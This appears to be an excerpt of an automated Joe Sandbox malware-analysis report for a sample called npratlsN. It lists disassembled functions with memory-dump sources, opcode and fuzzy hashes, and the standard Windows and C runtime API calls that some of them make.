Opcode ID: 618a3f0671207dfddfd39eaddf4125487feaf746d9848c40bdca1888408cdc24
Instruction ID: 5bb11e62e2a351c5bf7cc2216ceb77c080bd045f7b5828fc7bc511ca5c4b0fb1
Opcode Fuzzy Hash: 618a3f0671207dfddfd39eaddf4125487feaf746d9848c40bdca1888408cdc24
Instruction Fuzzy Hash: DDD19F78E00228CFDB14DFA5C994B9DBBB2BF89340F6081A9D409AB394DB355E85DF50

Function 20A4D588 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864127224.0000000020A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a40000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 307eb4307917cdc1568470a931728df3f9c9daf4589894c6b901aaa29edf9069
Instruction ID: cf56a2ad83589731cc1e6ca0df3d42d639287dbbed52e680b60415f1bcc7f63f
Opcode Fuzzy Hash: 307eb4307917cdc1568470a931728df3f9c9daf4589894c6b901aaa29edf9069
Instruction Fuzzy Hash: 4DD19F74E00228CFDB14DFA5C994B9DBBB2BF89340F6081A9D409AB394DB355E85CF51

Function 20A46790 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864127224.0000000020A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a40000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c68378ca96093cdc82d45f89ada8d97f69635a8885efdd78019fbc495a7637c7
Instruction ID: 10ba2fe0a0aff092582a868e85e2122c56089305236232f9e5e97694b7804364
Opcode Fuzzy Hash: c68378ca96093cdc82d45f89ada8d97f69635a8885efdd78019fbc495a7637c7
Instruction Fuzzy Hash: C9D19F74E00228CFDB14DFA9C994B9DBBB2BF89340F6081A9D409AB394DB355E85CF51

Function 20A42DA8 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864127224.0000000020A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a40000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad98d0ae0c82c00f5511f267326c3a4e80d68c4cc334fe1c067a36ad11808a03
Instruction ID: 49d5229940d3d295720f29fb480221f44ba07e1d9b864b19d86a543570cd34b0
Opcode Fuzzy Hash: ad98d0ae0c82c00f5511f267326c3a4e80d68c4cc334fe1c067a36ad11808a03
Instruction Fuzzy Hash: 61D1A078E00228CFDB15DFA5C984B9DBBB2BF89300F2081A9D509AB355DB355D85CF51

Function 20A40DB8 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864127224.0000000020A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a40000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 916208bbb3a746f9d3540a9cca11d9ab519e203924edccc466e1e6cd6cd1fbde
Instruction ID: 158f5ff99a48e2209424c9aa3022cab5df2189ff20cb05fa91e2472a678d1b9d
Opcode Fuzzy Hash: 916208bbb3a746f9d3540a9cca11d9ab519e203924edccc466e1e6cd6cd1fbde
Instruction Fuzzy Hash: 16D1AEB8E00218CFDB15DFA9C984B9DBBB2BF89300F2084A9D509AB354DB355E85DF51

Function 20A42488 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864127224.0000000020A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a40000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea8a0ca7398ade3a0185ab736281cd5d4aad5e6adedcce6caa1b6f1d5a6727a3
Instruction ID: fa04566c25a3e6b74c9e3a192088a4be15a78ccfc9bc6fd2ef19c81c6060f9e6
Opcode Fuzzy Hash: ea8a0ca7398ade3a0185ab736281cd5d4aad5e6adedcce6caa1b6f1d5a6727a3
Instruction Fuzzy Hash: 41D1CFB8E00228CFDB15DFA5C990B9DBBB2BF89300F6080A9E509AB354DB355D81CF51

Function 209CDC98 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 532191d9ff95fcad64c79d0f675f2b696494cf543e8a3060d9efbef9d0f49327
Instruction ID: 5714070e59bd65e3e618bb09c7f005850e221ffc077283cc9aa06b4048230be1
Opcode Fuzzy Hash: 532191d9ff95fcad64c79d0f675f2b696494cf543e8a3060d9efbef9d0f49327
Instruction Fuzzy Hash: 72C1E274E01228CFDB14DFA5C984B9DBBB2BF89301F2081A9D409AB395DB359E85CF51

Function 209CE0F0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aa1076fe0ab169412e0049badfe0cdca3c1abb5f4fd0d89fbfaf0c279718b22
Instruction ID: b7f96a25583530ad15fbcf7a6af7547858a1da30c71ec46857e390fdea941c4f
Opcode Fuzzy Hash: 8aa1076fe0ab169412e0049badfe0cdca3c1abb5f4fd0d89fbfaf0c279718b22
Instruction Fuzzy Hash: 8FC1C174E00228CFDB15DFA5C984B9DBBB2BF89301F2081A9D409AB395DB359E85CF51

Function 209CD840 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 280a7ef0c0298c8b8fdbb65aa15ec6b1f6e13408ae7c5bdf6dcff7d15c352e9d
Instruction ID: f216b34e068b02b5f0192652dcca7dfbb93001d46da40ba2e6603fcb1368f074
Opcode Fuzzy Hash: 280a7ef0c0298c8b8fdbb65aa15ec6b1f6e13408ae7c5bdf6dcff7d15c352e9d
Instruction Fuzzy Hash: A8C1D274E01218CFDB14DFA9C984B9DBBB2BF89301F2081A9D409AB395DB359E85CF51

Function 209CE9A0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f62bbce71bc9f5c396fe27ac145c04bce3df978ac109430a56bc5678b1575cb3
Instruction ID: e5a618086cec3b8f207342eb9e4b0b4281e883c09a81fdeccb5b5dc87ff96442
Opcode Fuzzy Hash: f62bbce71bc9f5c396fe27ac145c04bce3df978ac109430a56bc5678b1575cb3
Instruction Fuzzy Hash: EBC1C274E00228CFDB15DFA5C984B9DBBB2BF89301F2081A9D40AAB395DB355E85CF51

Function 209CB9D8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac1e9b6a2e0091a378f133f5b723247ec1e6d02674e9a3df5082f24b6504f046
Instruction ID: 5bb0c991b3a148b607041a90949ad8be79ed2b685f0129a18031a38be682636b
Opcode Fuzzy Hash: ac1e9b6a2e0091a378f133f5b723247ec1e6d02674e9a3df5082f24b6504f046
Instruction Fuzzy Hash: 07C1D174E00228CFDB14DFA5C984B9DBBB2BF89301F2081A9D409AB395DB359E85CF51

Function 209CEDF8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cb5576109ef3b0c93b6fc2f82a7e6d94c4d33cbf274e1bd9cdf6efa591b3f0d
Instruction ID: 8b26c0c8322008ba506c2aa2d701b8fb6b9e30761dcde6e1221cb65f71881f92
Opcode Fuzzy Hash: 3cb5576109ef3b0c93b6fc2f82a7e6d94c4d33cbf274e1bd9cdf6efa591b3f0d
Instruction Fuzzy Hash: A8C1E274E00218CFDB15DFA5C994B9DBBB2BF89301F2080A9D409AB395DB355E85CF51

Function 209CE548 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b3c6a29243f339276dcd72e6a37949ef06a47dcdc1847c2ebccb04b3750728a
Instruction ID: ad7565c477110aab560fbe599f2732227e37b090c5df821ed5e5b29e11269c0e
Opcode Fuzzy Hash: 2b3c6a29243f339276dcd72e6a37949ef06a47dcdc1847c2ebccb04b3750728a
Instruction Fuzzy Hash: FCC1D174E00228CFDB15DFA5C984B9DBBB2BF89301F2081A9D409AB395DB359E85CF51

Function 209CC288 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b5f97a79fada6286780a84a8d2c8eed45282dc6124ff87c0116a819584ba2ec
Instruction ID: 39111dc389af9c305573c14ec4984a5699dbfd7077ff543b36fc3ec2c49ec7ec
Opcode Fuzzy Hash: 1b5f97a79fada6286780a84a8d2c8eed45282dc6124ff87c0116a819584ba2ec
Instruction Fuzzy Hash: 76C1D4B4E00218CFDB14DFA5C994B9DBBB2BF89301F2081A9D409AB3A5DB355E85CF51

Function 209CF6A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 022b7f28fc7ae849281abba5eaafa352ad8caf622131c336831f016e9b2d0fc3
Instruction ID: f4f5d9ffc49c7d6966c1f6ee1ecab4c5d153ccc6b1a48b37d5d6e3ca1ca429b9
Opcode Fuzzy Hash: 022b7f28fc7ae849281abba5eaafa352ad8caf622131c336831f016e9b2d0fc3
Instruction Fuzzy Hash: FDC1C174E00228CFDB14DFA5C994B9DBBB2BF89301F2081A9D409AB395DB359E85CF51

Function 209CC6E0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6108f549f8baed0111075ed6fbd0d9eabde1edca029c59b229f0d249c431492
Instruction ID: c503395da7fd2bbd70f3984cda0fc15c25e45c5ee2777214ea26f37241825c5e
Opcode Fuzzy Hash: f6108f549f8baed0111075ed6fbd0d9eabde1edca029c59b229f0d249c431492
Instruction Fuzzy Hash: 13C1B0B4E00218CFDB15DFA5C984B9DBBB2BF89301F2081A9D409AB3A5DB355E85CF51

Function 209CBE30 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cd0d8233f6c246df16f8ece7964816c30dba8ddc69c470e2e142ae62880113f
Instruction ID: 20e6b875fdc7cd56b5767c853e29b14b8580f0409a35ec161173191df9e54051
Opcode Fuzzy Hash: 8cd0d8233f6c246df16f8ece7964816c30dba8ddc69c470e2e142ae62880113f
Instruction Fuzzy Hash: C9C1D374E00218CFDB14DFA5C994B9DBBB2BF89301F2081A9D409AB3A5DB359E85CF51

Function 209CF250 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26a9b96650e5bf731d231248d4968f88385a0d176d8f4052a85c3a2876f839f8
Instruction ID: 05c676bd331569976010225e73bed548735a9f4f446d741b934fe3a32afda056
Opcode Fuzzy Hash: 26a9b96650e5bf731d231248d4968f88385a0d176d8f4052a85c3a2876f839f8
Instruction Fuzzy Hash: 42C1D174E00218CFDB14DFA5C994B9DBBB2BF89301F2081A9D409AB3A5DB359E85CF51

Function 209CD3E8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb5a3b66bc1c4957eddec64f2eb5624ea808ca77e791e4b745b95873f6d51237
Instruction ID: 3a3dc3e588d2c85d0ac95354f188f3f2ccfed10f7f5577d3a2bf136cacbf6d65
Opcode Fuzzy Hash: fb5a3b66bc1c4957eddec64f2eb5624ea808ca77e791e4b745b95873f6d51237
Instruction Fuzzy Hash: 60C1D274E01218CFDB14DFA9C984B9DBBB2BF89301F2080A9D409AB395DB355E85CF51

Function 209CFB00 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27f26686921e89f3ca568d7428eb194a7623e9033aee8c2dca42ef76b13f5fcd
Instruction ID: 00ccf40ad0dfee294dda9ee22df6fc8ab018c8e21a6d143d19afa7338e2b0059
Opcode Fuzzy Hash: 27f26686921e89f3ca568d7428eb194a7623e9033aee8c2dca42ef76b13f5fcd
Instruction Fuzzy Hash: B3C1C174E00218CFDB14DFA5C994B9DBBB2BF89301F2081A9D409AB395DB359E85CF51

Function 209CCB38 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 043e92a4030438446f4f0ede955f3d943b6831c4795be606a8a82a9f83e1c64a
Instruction ID: 64205aa7340cbd0cf7182566ec1255f66b7ef83ec1511047e30d5104bea3654a
Opcode Fuzzy Hash: 043e92a4030438446f4f0ede955f3d943b6831c4795be606a8a82a9f83e1c64a
Instruction Fuzzy Hash: 8FC1C3B4E00218CFDB15DFA5C984B9DBBB2BF89301F2081A9D409AB3A5DB355E85CF51

Function 1F90DF1B Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68c413deeec3ece80577a18fcc94e7655ba7dfcc89f59e87a93a2590ed18a933
Instruction ID: e9fedd3b57eee714a2db00a11e476d1b95c6856488f5ffe53dda0998d8864396
Opcode Fuzzy Hash: 68c413deeec3ece80577a18fcc94e7655ba7dfcc89f59e87a93a2590ed18a933
Instruction Fuzzy Hash: E6515330E05218CBDB00FFA8C5947EEBBBABB89301F20D129D401AB2D5DB75A981CF54

Function 1F90E114 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fb28de932509cb2100461acf7f78394b61ced37e1084508992bee9d2c5c334a
Instruction ID: 3797a114b88811658a9796e71516a5f2167095da1f22f169b682ef9b1908d158
Opcode Fuzzy Hash: 0fb28de932509cb2100461acf7f78394b61ced37e1084508992bee9d2c5c334a
Instruction Fuzzy Hash: E251F474E05218CFDB10FFA8C5947EDBBBABB49301F209629D405AB2D1D735A982CF54

Function 21293B64 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3865585011.0000000021290000.00000040.00000800.00020000.00000000.sdmp, Offset: 21290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_21290000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66f1bcba2d21652ad942a427ee5c6ad288f5daf9074d1e1f5f56c8e2359d88d9
Instruction ID: 17d711eeb3362bf7d39a0b6b001fb19114d83f61da7757e0ff8d12258da9e2d2
Opcode Fuzzy Hash: 66f1bcba2d21652ad942a427ee5c6ad288f5daf9074d1e1f5f56c8e2359d88d9
Instruction Fuzzy Hash: 543198B4D012089FCB14CFA9E984A9EFBF5BB49310F20942AE918BB310D374A945CF94

Function 212977E0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3865585011.0000000021290000.00000040.00000800.00020000.00000000.sdmp, Offset: 21290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_21290000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0cd03fb9bb01f2d3aa1e2b1969e84c5bb635906c43b47cca5d9da26abb1bcc2
Instruction ID: 730a58b7cabdacb0d0d67229bf19351dd295dd0e0770aa4cb67ba86d38a887f4
Opcode Fuzzy Hash: a0cd03fb9bb01f2d3aa1e2b1969e84c5bb635906c43b47cca5d9da26abb1bcc2
Instruction Fuzzy Hash: 4D31A8B5D012099FCB14CFA9D980AEEFBF5BB49310F20942AE418BB310D374A945CF54

Function 20A8FDEE Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864442464.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a80000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0866599d8c3deb09e5b0807601c17333d04b3b8d1a34a4d0f45225d6ba60193
Instruction ID: 8a86c61917f251696e875e8d840b841e135ab2ce12422b942dfb180f63dfc2d9
Opcode Fuzzy Hash: c0866599d8c3deb09e5b0807601c17333d04b3b8d1a34a4d0f45225d6ba60193
Instruction Fuzzy Hash: 42D09E78D5435D9ACF10EF98E8407BDB775FFC6200F0024D58008B7151D7306E509E16

Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,1C7618E0), ref: 004170C5
MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
_malloc.LIBCMT ref: 0041718A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
_malloc.LIBCMT ref: 0041724C
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
__freea.LIBCMT ref: 004172A4
__freea.LIBCMT ref: 004172AD
___ansicp.LIBCMT ref: 004172DE
___convertcp.LIBCMT ref: 00417309
LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
_malloc.LIBCMT ref: 00417362
_memset.LIBCMT ref: 00417384
LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
___convertcp.LIBCMT ref: 004173BA
__freea.LIBCMT ref: 004173CF
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9

Memory Dump Source

Source File: 0000000D.00000001.2243005056.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000001.2243005056.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000001.2243005056.000000000043F000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_1_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
String ID:
API String ID: 3809854901-0
Opcode ID: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
Opcode Fuzzy Hash: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 004057DE

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

_malloc.LIBCMT ref: 00405842
_malloc.LIBCMT ref: 00405906
_malloc.LIBCMT ref: 00405930

Strings

1.2.3, xrefs: 004058EC, 00405937

Memory Dump Source

Source File: 0000000D.00000001.2243005056.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000001.2243005056.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000001.2243005056.000000000043F000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_1_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap
String ID: 1.2.3
API String ID: 680241177-2310465506
Opcode ID: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
Opcode Fuzzy Hash: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040BD24
_memcpy_s.LIBCMT ref: 0040BD99
__fileno.LIBCMT ref: 0040BDF9
__read.LIBCMT ref: 0040BE00
__filbuf.LIBCMT ref: 0040BE24
_memset.LIBCMT ref: 0040BE6A
_memset.LIBCMT ref: 0040BE95

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Memory Dump Source

Source File: 0000000D.00000001.2243005056.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000001.2243005056.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000001.2243005056.000000000043F000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_1_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Function 004017E0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON

Download Yara Rule

APIs

EntryPoint.NPRATLSN(80070057), ref: 004017EE

Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,00000015,2C2D8410), ref: 0040101C
Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030

EntryPoint.NPRATLSN(80070057), ref: 00401800
EntryPoint.NPRATLSN(80070057), ref: 00401813
__recalloc.LIBCMT ref: 00401828
EntryPoint.NPRATLSN(8007000E), ref: 00401839
EntryPoint.NPRATLSN(8007000E), ref: 00401853
_calloc.LIBCMT ref: 00401861

Memory Dump Source

Source File: 0000000D.00000001.2243005056.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000001.2243005056.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000001.2243005056.000000000043F000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_1_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
String ID:
API String ID: 1721462702-0
Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE

Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00414744

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__getptd.LIBCMT ref: 0041475B
__amsg_exit.LIBCMT ref: 00414769
__lock.LIBCMT ref: 00414779

Strings

@.B, xrefs: 00414786

Memory Dump Source

Source File: 0000000D.00000001.2243005056.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000001.2243005056.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000001.2243005056.000000000043F000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_1_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
